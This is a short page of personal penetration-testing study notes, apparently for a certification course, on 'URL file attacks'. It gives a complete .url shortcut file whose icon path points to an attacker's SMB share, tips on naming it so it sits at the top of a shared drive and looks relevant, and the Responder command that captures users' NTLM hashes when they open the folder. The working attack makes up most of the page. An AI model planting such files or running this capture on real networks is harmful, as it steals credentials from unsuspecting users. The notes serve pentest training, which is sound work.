Search

Home

PNPT Studies

PJPT Studies

AD CS / Certificate Attacks (ESC1-15) (1, 8, 11 for now)

Report Writing / Client Presentation

Operationalizing Cybercrime Data (June 2025)

URL File Attacks

Tips:

  • Social engineering! Use:
    • Microsoft Word
    • Outlook/Email
    • Get people to open a file or certain things to get a hash back to you in Responder

Create an intriguing file in shared drive:

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\192.168.218.128\%USERNAME%.icon #Kali IP
IconIndex=1

Important things when saving it:

  • Needs @ or ~ and .url and in quotes
    • Example: “@test.url”

Intriguing is:

  • naming it relevant to the directory it’s in

Open Responder:

sudo responder -I eth0 -v

When the user visits the folder, you get a hash dump

image